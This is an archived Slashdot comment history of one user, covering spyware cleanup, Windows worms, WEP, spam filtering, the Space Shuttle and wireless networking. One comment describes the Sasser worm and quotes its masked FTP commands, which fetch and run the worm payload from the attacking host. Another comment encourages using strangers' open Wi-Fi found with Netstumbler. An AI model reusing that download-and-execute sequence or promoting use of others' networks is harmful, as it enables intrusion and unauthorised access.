Slashdot Mirror


User: mrneutron

mrneutron's activity in the archive.

Stories: 0
Comments: 41

Comments · 41

  1. Re:The biggest surprise... on Modified Prius gets up to 180 Miles Per Gallon · · Score: 2, Informative

    You're forgetting that a UK imperial gallon == 1.20 US gallons. So please adjust your British "MPG" accordingly for an apples-to-apples comparison.

    My car gets forty rods to the hogshead, and that's the way I likes it!

  2. Re:Nice on Forward This Article And Get Paid $203.15 · · Score: 2, Informative

    I disagree. Many, many internet hoaxes were born before 1997. 'David Rhodes' & MAKE.MONEY.FAST date to the 80's, many others date from the early 90s. Here's the David Rhodes hoax from Usenet in 1989

  3. Joe Sixpack and TCO on Spyware Becoming Worst Tech Support Problem · · Score: 5, Interesting

    Last night I spent 3 hours at a neighbor's house on spyware patrol. He's a fireman who plows my driveway for free (he is Joe Sixpack personified), and I'm his volunteer tech monkey. I cleaned them all out 2 months ago, and now they were in worse shape.

    All 3 of the computers were unable to surf the web. Teenage daughters had downloaded Kazaa, weatherbug, morpheus and others. I explained the dangers of spyware (and getting sued by the RIAA, hoping to scare them into ending the spyware party) to them last time, with predictable results. I also advised Dad to lay down the law (I'm not holding my breath).

    The 98SE box (yeah, I know) was completely hosed. Booted up, auto-launched about 8 different programs, auto popups, and would actually blue screen before I could launch a single app. I blew that one away, reinstalled from scratch, and ran Windows update (requiring 5 reboots) for close to 2 hours (ever run windows update after a clean install of 4-year old media? Not fun).

    And he has a hardware firewall and fast cable modem connection: this would have been impossible on dialup (and the clean install would have been compromised within 10 minutes without the firewall).

    After all of this, I had all 3 computers working fine, with up-to-date patches, virus protection, and an Ad Aware icon on the desktop. Also a lecture on the evils of spyware to the assembled daughters.

    I'll be back there in a month or 2, guaranteed. Let's hope for lots of snow next winter.

  4. Re:Security Update Dates on New Windows Worm on the Loose · · Score: 2, Informative

    Sasser was released 18 days after Microsoft released the patch. For comparison, Blaster was 32 days after the patch and Witty was 1 day(!).

  5. How it works on New Windows Worm on the Loose · · Score: 5, Informative

    It infects a 2000 or XP box via the LSASS (MS04-011) exploit, and opens a shell on port 9996.

    It then connects to that shell, and executes the following commands (cleaned up to get past Slashdot's junk filter):

        open XXX.XXX.XXX.XXX 5554
        anonymous
        user
        bin
        get XXXXX_up.exe
        bye
        XXXXX_up.exe

    If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from Symantec:

    The IP addresses generated by the worm are distributed as follows:

    • 50% are completely random
    • 25% have the same first octet as the IP address of the infected host
    • 25% have the same first and second octet as the IP address of the infected host.

    The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.

    See:

    • http://securityresponse.symantec.com/avcenter/venc/data/w32.sasser.worm.html

  6. First impressions on Google's Gmail Goes Into Beta for Blogger Users · · Score: 4, Informative

    My impression thus far: very sweet.

    I tried registering some short usernames, the username has to be 6 characters or longer.

    So I have a leet 6-character name@gmail.com.

    Transit time for sent and received mail is near-instantaneous.

    The interface is trademark google utilitarian. Two thumbs up.

    I sent some test spam from my spam folder, they got into my inbox (and not to my 'spam' folder on gmail). So they have some tweaking to do there.

  7. Re:OK, so how about on WebDAV Buffer Overflow Attack Compromises IIS 5.0 · · Score: 1

    Um, because the number of internet-exploitable IIS 5 systems outnumbers the number of internet-exploitable MySQL and Samba systems by a factor of at least 100 to 1?

    Similar Apache bugs have received 'front page' billing, which is appropriate.

  8. The recession is open source's best friend on CIOs Looking At OSS · · Score: 4, Insightful

    With ever-tightening budgets, open source is getting a firm hold in many companies that would have bought closed source retail software during the fat budget years.

    I've had a number of open source-based projects greenlighted (intrusion detection, vulnerability scanners, virus/spam blocking SMTP gateways, etc.) that would not have been approved if we had to pay large operating system or software licensing fees.

  9. Re:The shuttle should be permanently grounded on NASA To Try To Resume Flights By Fall · · Score: 1

    Agreed; my math is off. I retract my '1 in 8 claim.' I apologize (and wasn't intentionally trolling).

    The rest of my points stand.

  10. Re:The shuttle should be permanently grounded on NASA To Try To Resume Flights By Fall · · Score: 0

    Yes, 2 in 113 of the whole crew dying. 1 in 8 of any given astronaut. My math is fine. I'm not trolling here: the truth hurts.

    Of course space is dangerous, and there should be a good reason for putting human beings in such danger. There isn't any compelling reason for the Shuttle to fly.

    Read the article: it's outdated design. The shuttle can't carry heavy cargoes, and can't reach most satellite orbits. It's basically a powerless glider once it hits orbit. And it's hugely expensive compared with unmanned craft (which can carry far heavier cargoes, reach all orbits, and fail without killing 7 astronauts).

    Did you know NASA predicted *WEEKLY* shuttle flights, to justify the massive expense of the program (compared with unmanned rockets)?

    It's time for something new.

  11. The shuttle should be permanently grounded on NASA To Try To Resume Flights By Fall · · Score: 1, Insightful

    Disagree? Read this spooky article written in 1980. Predicted death, both by explosion on liftoff, and due to failed tiles on landing.

    http://www.washingtonmonthly.com/features/2001/8004.easterbrook-fulltext.html

    The shuttle was an expensive boondoggle in 1980. 14 dead astronauts later, and it's now a catastrophic disaster.

    113 flights and 14 dead astronauts = 1 in 8 chance of an astronaut dying on any given flight. All this for junk science like ant colonies in space (call Homer Simpson!), and soybean germination in zero gravity.

    The shuttle design is 30 years old. We have to be capable of better design now. NASA should return to unmanned missions, and go back to the drawing board for future manned flights.

  12. Re:Is it reasonably secure now? on 802.11g Hardware Arrives · · Score: 2

    Could you detail a real-world attack that would break the security of the network I described above? Also, how long this real-world attack would take to complete?

    In my tests, Airsnort, etc., were painfully slow on normal WEP networks, never mind WEP+ (point taken that it's not standard) with dual keys.

    I'm not arguing with your points: 'reasonable security' is highly subjective (a home user and a bank would have different answers). I'd like to know what specific steps someone would need to take to break into a network as I described today.

  13. Re:Is it reasonably secure now? on 802.11g Hardware Arrives · · Score: 2

    802.11g has the same security as 802.11b.

  14. Re:Is it reasonably secure now? on 802.11g Hardware Arrives · · Score: 4, Informative

    Weak keys were addressed by 'WEP+', an 802.11b firmware upgrade which negates the weak initialization vector attack. WEP+ is now available from most vendors.

    Many 802.11b APs also allow separate xmit and recv keys, making WEP attacks much more difficult.

    Then disable SSID broadcasts (making your 802.11b wireless network invisible to tools like netstumbler).

    WEP certainly has its weaknesses (especially when 802.11b was first released), but is arguably 'reasonably secure' today. It's far from perfect, but is not nearly as bad as people make it out to be.

  15. DNSBL Fallacy #1 on The Spam Problem: Moving Beyond RBLs · · Score: 2

    'SPEWS is bad, so DNSBLs are bad!'

    Wrong. I use DNSBLs to block 10,000+ spams/week aimed at my users. I was using static relay REJECTs via the sendmail access file, but could not keep up with the torrent and increasing user complaints.

    Aside from the obvious potential waste of time and bandwidth those 10,000 spams represent, much of it is obscene and sent by criminals.

    I also track rejected mail and whitelist relays when necessary. This system works very well.

    I chose not to use SPEWS due to collateral damage concerns. It's my call. If you are a postmaster, it's your call as well. One size does not fit all. DNSBLs are an invaluable tool.

  16. Warning to Slashdotters on PC in a.... Sphere? · · Score: 2

    Before you hit 'reply' to this topic, remember: do not taunt the Happy Fun Ball:

    http://www.happyfunball.com/hfb.html

  17. Re:It doesn't take that much time on Spam Archive opening FTP service December 4 · · Score: 2

    Then it's time to deploy the right solution.

    The time and money you invest in the short term will be repaid many times over in the long term. Spammers will send less successful spam, which is a win for all of us. You & your users will be much happier, too.

  18. It doesn't take that much time on Spam Archive opening FTP service December 4 · · Score: 4, Informative

    I also manage email for 10,000+ users. And I do a lot more than that; it simply does not take that much time if you handle things properly.

    For corporate-wide spam blocking, sendmail has some great spam filtering features via DNS Black Lists (dnsbl). I use spamhaus.org and relays.osirusoft.com.

    Add these lines to your sendmail.mc:

    FEATURE(dnsbl, `sbl.spamhaus.org', `"550 Mail from " $&{client_addr} " rejected, see http://www.spamhaus.org/"')dnl

    FEATURE(dnsbl, `relays.osirusoft.com', `"550 Mail from " $&{client_addr} " rejected, see http://relays.osirusoft.com"')dnl

    There goes 90+% of the problem. After that, spamassassin handles the 10% that trickles through quite nicely.

    If you don't use sendmail, all other modern mail relays can handle this problem in similar ways.

  19. It's HIPAA on Hospital Brought Down by Networking Glitch · · Score: 3, Informative

    Health Insurance Portability and Accountability Act.

    Most health care organizations are far from clueless, believe me. Your average healthcare IT manager is well aware of HIPAA, as they've been working on the transaction and privacy aspects for quite a while.

    The techs in the trenches may know less, mostly because the data security regulations (the 3rd, and largest portion of the HIPAA work) are not yet finalized. The real work doesn't begin until then: probably sometime later this year.

  20. Re:Are there still hardcore BSD-ers? on FreeBSD September-October 2002 Development Status · · Score: 5, Insightful

    I've run linux since Slackware & the beta kernel days. That era ended (professionally) when I had to support production internet servers (Squid http proxy, sendmail gateways, and apache web servers) running the Linux 2.4 kernel (AKA the 'kernel of pain').

    Lots of instability, phantom escalating tcp timeouts, and high-traffic production boxes would crash or become unstable after 1-3 weeks of use, requiring a reboot. I upgraded the 2.4 kernel multiple times, but never resolved all problems.

    I'm still a fan, but Linux really stumbled with the 2.4 kernel. There's always a balance between features and stability, and 2.4 got that balance wrong. Very wrong.

    I switched all production servers to FreeBSD. One of the best decisions of my career. 10 months later: 100% uptime. Literally. Same hardware, same applications, same network, more users, heavier usage. Rock !@#$-ing solid.

  21. Re:Why content filtering is not enough on As the Spam Turns · · Score: 2

    > However, they have no effect on the cost of the
    > bandwidth and other resource costs of spam

    Not true. Many spammers include unique URLs within spam that are tracked when a user clicks (or even previews via Outlook) on a spam. This proves a spam was actually viewed, and these views are tracked closely. An email address that is proven to view spam is worth much more to spammers than one that isn't, and these addresses are bought and sold at a premium.

    Any account that views spam will eventually receive a lot more spam than one that doesn't.

    If you stop the views, you slow the spam.

    So this helps the bandwidth problem, especially in the long run.

  22. 802.11b is the answer on Wireless Dilemma at Newton's House? · · Score: 2

    I work in a ground-floor data center in an old building. My indoor 802.11b access point is across the hall and must cross through 2 foot-thick cinderblock concrete walls to reach me.

    I have good bandwidth, with a generic omnidirectional antenna on the AP. I can also access the network from the street 50+ meters away.

    A plain-vanilla 802.11b wireless network with directional antennas will work fine here. 802.11b's wavelength lends itself to these sorts of applications (802.11a, while faster for line-of-sight, degrades badly in these types of situations).

    This is true even if the antennas are indoors, pointing through brick walls.

    Add directional antennas pointing through windows, and the situation will improve dramatically. Add small hidden outdoor antennas, and the picture is even better.

    A wireless tech told me that he hooked up a 50-mile 802.11b network in Africa between 2 mountaintops (one with local internet access, the other without). The wireless link was 'only' 2 mbits (down from a theoretical 11 mbits), but otherwise worked fine.

    This one's easy.

  23. True story from support desk hell on Beyond Dvorak via Genetic Algorithm · · Score: 5, Funny

    A friend does PC support (including telecommuter support) for a large retail company. A woman called in, to say that her home PC was acting strangely, and not typing the keys she pressed.

    My friend went to her house with a new keyboard. When he looked at the old one, he saw that the keys were arranged alphabetically, with 'a' where the q is supposed to be, 'b' where the w is, etc.

    She explained that she was having trouble finding the keys, so she rearranged them so she could find them easier.

  24. A $25 Million dollar ad campaign... on Microsoft/Unisys Unix-bashing Site Runs FreeBSD · · Score: 5, Funny

    ...and they can't afford a firewall.

    On behalf of Unix Engineers everywhere: Thank you Unisys. Thank you, Microsoft.

  25. Nobody will pay for excess wireless bandwidth on Selling Your Wireless Traffic to Passers-By · · Score: 2, Interesting

    ...because you can get it for free, with exponentially more coverage than this scheme offers.

    Crank up Netstumbler (http://www.netstumbler.com) on your laptop, and drive around. You'll be amazed at how many open networks you find; at least 2/3rds don't even use WEP encryption. The Linksys wireless AP is now less than $200: they're everywhere (and most are running on the default config, and offer a DHCP IP address with no questions asked).